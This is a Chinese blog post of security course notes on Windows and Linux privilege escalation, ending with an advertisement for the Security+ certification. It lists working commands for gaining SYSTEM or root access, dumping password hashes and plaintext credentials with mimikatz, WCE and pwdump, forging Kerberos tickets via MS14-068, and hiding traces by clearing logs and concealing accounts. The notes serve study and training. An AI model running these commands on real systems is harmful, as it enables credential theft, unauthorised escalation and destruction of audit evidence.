1. 程式人生 > >【安全牛學習筆記】提權

【安全牛學習筆記】提權

security+ linux 信息安全

Windows

user

Administrator

System

Linux

User

Root

windows提權

將admin提權為system

net user命令 查看賬戶

Guest 用戶,權限很小

HelpAssistant 用戶,遠程協助賬號

Windows system賬號

系統設置管理功能

SysInternal Suite工具

https://technet.microsoft.com/en-us/sysinternals/bb545027

放到/WINDOWS/system32 目錄下就可在cmd中使用

psexec -i -s -d taskmgr 套件中的工具,-i 使用交互模式,-s 提升為system執行程序

windos internal書

at命令提權(xp,2003)

at 19:39 /interactive cmd 指定時間執行cmd,獲得system權限,再啟動其他進程都會以system賬戶運行,taskmgr命令打開任務管理器,先把explorer進程(桌面進程)kill,再以system權限打開

技術分享

sc命令提權

sc Create syscmd binPath= "cmd /K start" type= own type= interact 重新啟動命令行窗口,交互式,創建了系統服務syscmd

sc start syscmd 啟動服務(系統服務默認以system權限啟動,得到system權限)

註入進程提權

隱蔽痕跡

pinjector.exe

http://www.tarasco.org/security/Process_Injector/

pinjector -p <PID> <cmd> <port> <inject into PID> 註入進程同時監聽端口

抓包嗅探

Windows

Wireshark

Omnipeek

commview

Sniffpass 基於抓包的嗅探密碼工具

Linux

Tcpdump

Wireshark

Dsniff ftp的明文傳輸協議可以直接抓到密碼

本地緩存密碼

瀏覽器緩存的密碼

IE瀏覽器

Firefox

網絡密碼

無線密碼

http://www.nirsoft.net

Dump SAM

Pwdump

命令行工具

將操作系統保存的密碼哈希值導出,xp系統默認保存在system32/SAM

/usr/share/windows-binaries/fgdump/

Pwdump.exe localhost 顯示本地的賬戶和密碼

WINDOWS身份認證過程

windos LOGON程序,用LMHash與NTHash將輸入的密碼hash計算與SAM數據庫比對,遠程登錄時,先計算再傳輸給主機,hash逆向計算結果不唯一,傳輸用NTLM協議

技術分享

WCE(WINDOWS CREDENTIAL EDITOR)

Windows身份驗證編輯器,從內存中讀信息

/usr/share/wce/

需要管理員權限

wce-universal.exe -l / -lv 顯示已經登陸的賬號/顯示詳細信息

wce-universal.exe -d 指定LUID刪除登錄

wce-universal.exe -e 指定刷新時間

wce-universal.exe -r 每隔5秒刷新登錄信息

wce-universal.exe -g 計算指定字符串的hash值

wce-universal.exe -w 顯示內存中存放的明文密碼!!

wce-universal.exe -i <LUID> -s <另一個賬戶信息> 指定LUID,將賬戶信息修改為指定

LM /NT hash

從內存讀取LM / NTLM hash

Digest Authentication Package

NTLM Security Package

Kerberos Security Package

防止WCE攻擊:

註冊表位置:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

kerberos msv1_0

schannel

wdigest 用於本機登錄,將此項刪除,操作系統變成了單用戶狀態

tspkg 用於遠程登錄

pku2u

fgdump工具

mimikatz工具

:: 顯示幫助

privilege::debug 提升權限

sekurlsa::logonPasswords 顯示賬戶的詳細信息

sekurlsa模塊:

技術分享

process模塊:

技術分享

lsadump模塊:

技術分享

ts::multirdp 允許多用戶同時登錄

event模塊,clear清除日誌,drop不再產生新日誌

misc模塊:

技術分享

利用漏洞提權

Ms11-080 漏洞編號,11年的80個

Kb2592799 漏洞補丁

https://technet.microsoft.com/library/security/ms11-080

將python腳本編譯為exe文件,可在目標機器直接運行

Pyinstaller

將腳本轉換為exe

將解壓文件放到python目錄下,將腳本放到pyinstaller目錄下

https://pypi.python.org/pypi/PyInstaller/2.1

python pyinstaller --onefile ms11-080.py

Pywin32

http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/

net localgroup administrators a /add

M S11-046

DoS

域服務器:

必須是windos server操作系統

ip地址必須為靜態ip,網關192.168.1.1,DNS服務器ip地址就是自己的ip地址

管理員賬戶在升級成域後自動變成域管理員

運行dcpromo,會開始Active Directory向導,給域起DNS全名aa.com

NetBIOS名稱默認aa,活動目錄數據庫不要和系統盤放一起,設置為DNS服務器

MCSE認證,MCST認證

要連接域的機器的DNS服務器設置為域控的ip地址

域用戶密碼必須符合密碼復雜度要求

Ms14-068

https://github.com/bidord/pykek

ms14-068.py -u [email protected] -s userSID -d dc.lab.com

拷貝 [email protected] 到windows系統

本地管理員登陸

mimikatz.exe log "kerberos::ptc [email protected]" exi

Ubuntu11.10 (官方停止更新更新源)

http://old-releases.ubuntu.com/releases/11.10/

gcc(在安裝光盤中集成了常用軟件包,可插入光盤安裝)

sudo mount /dev/cdrom /media/cdrom 將光盤掛載

sudo apt-cdrom add && sudo apt-get install gcc 將光盤掛載到更新源裏並安裝軟件

gcc 18411.c -o exp

CVE-2012-0056

/proc/pid/mem 啟動過程中生成的臨時目錄

kernels >=2.6.39

http://blog.zx2c4.com/749

利用代碼:18411.c

遠程拷貝:scp 文件目錄 [email protected]:目標目錄

利用配置不當提權

與漏洞提權相比 更常用的方法

企業環境

補丁更新的全部已經安裝

輸入變量過濾之外更值得研發關註的安全隱患

以system權限啟動 系統服務以system權限啟動

NTFS權限允許users修改刪除

icacls程序

查看NTFS權限

icacls c:\windows\*.exe /save txt /T 查看所有程序權限列表,保存成文件

i586-mingw32msvc-gcc -o admin.exe admin.c 編譯成windows環境下的可執行程序

Find

linux檢查文件權限:當前用戶用戶組所有用戶

find / -perm 777 -exec ls -l {} \; 查找全權限的程序,777(全權限)

需要收集的信息:

Linux

/etc/resolv.conf DNS配置

/etc/passwd 所有用戶都可以read

/etc/shadow 用戶賬號密碼,只有root和shadow用戶可以讀

whoami and who –a

ifconfig -a,

iptables -L -n, 查看防火墻設置

netstat –nr 網關和路由設置

uname –a, 內核版本

ps aux 進程列表

dpkg -l | head 軟件包列表

Windows

ipconfig /all ,

ipconfig /displaydns dns緩存

netstat -bnao , netstat –r 查看路由

net view , net view /domain

net user /domain, net user %username% /domain

net accounts, net share 查看分享

net localgroup administrators username /add 添加到管理員組

net group "Domain Controllers" /domain 查看主機賬號

net share name$=C:\ /unlimited 將c盤不設限制

net user username /active:yes /domain將域環境下被鎖定的賬戶激活

WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)

windows下的管理框架

wmic nicconfig get ipaddress,macaddress讀取ip和mac地址

wmic computersystem get username查看登錄賬號

wmic netlogin get name,lastlogon查看登錄記錄

wmic process get caption, executablepath,commandline查看進程

wmic process where name=“calc.exe" call terminate結束進程

wmic os get name,servicepackmajorversion 提取操作系統版本

wmic product get name,version查看軟件

wmic product where name=“name” call uninstall /nointeractive 卸載

wmic share get /ALL看共享文件夾

wmic /node:主機名 path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1“ 開啟遠程桌面

wmic nteventlog get path,filename, writeable 查看系統日誌文件目錄

收集敏感數據

商業信息

系統信息

Linux

/etc配置文件目錄

/usr/local/etc配置文件

/etc/passwd ;/etc/shadow

.ssh 遠程連接的密鑰

.gnupg 公私鑰

The e-mail and data files

業務數據庫 ;身份認證服務器數據庫

/tm

windows

SAM 數據庫 ; 註冊表文件

%SYSTEMROOT%\repair\SAM SAM副本

%SYSTEMROOT%\System32\config\RegBack\SAM

業務數據庫 ; 身份認證數據庫

臨時文件目錄

UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\

隱藏痕跡

禁止在登陸界面顯示新建賬號

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0

del %WINDIR%\*.log /a/s/q/f

History

history -c 清除執行命令歷史

日誌

auth.log / secure btmp/wtmp

lastlog / faillog

其他日誌和 HIDS 等

該筆記為安全牛課堂學員筆記,想看此課程或者信息安全類幹貨可以移步到安全牛課堂

Security+認證為什麽是互聯網+時代最火爆的認證?


牛妹先給大家介紹一下Security+


Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重信息安全管理相比,Security+ 認證更偏重信息安全技術和操作。

通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程序、數據和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。

Security+認證如此火爆的原因?

原因一:在所有信息安全認證當中,偏重信息安全技術的認證是空白的, Security+認證正好可以彌補信息安全技術領域的空白 。

目前行業內受認可的信息安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由於Security+偏重信息安全技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。

原因二: IT運維人員工作與翻身的利器。

在銀行、證券、保險、信息通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍,死亦寫代碼”的悲壯,但也有著“鋤禾日當午,不如運維苦“的感慨。天天對著電腦和機器,時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝著網絡安全的方向發展,解決國內信息安全人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。

原因三:接地氣、國際範兒、考試方便、費用適中!

CompTIA作為全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。

在目前的信息安全大潮之下,人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的,相信Security+認證一定會成為最火爆的信息安全認證。

本文出自 “11662938” 博客,請務必保留此出處http://11672938.blog.51cto.com/11662938/1977644

【安全牛學習筆記】提權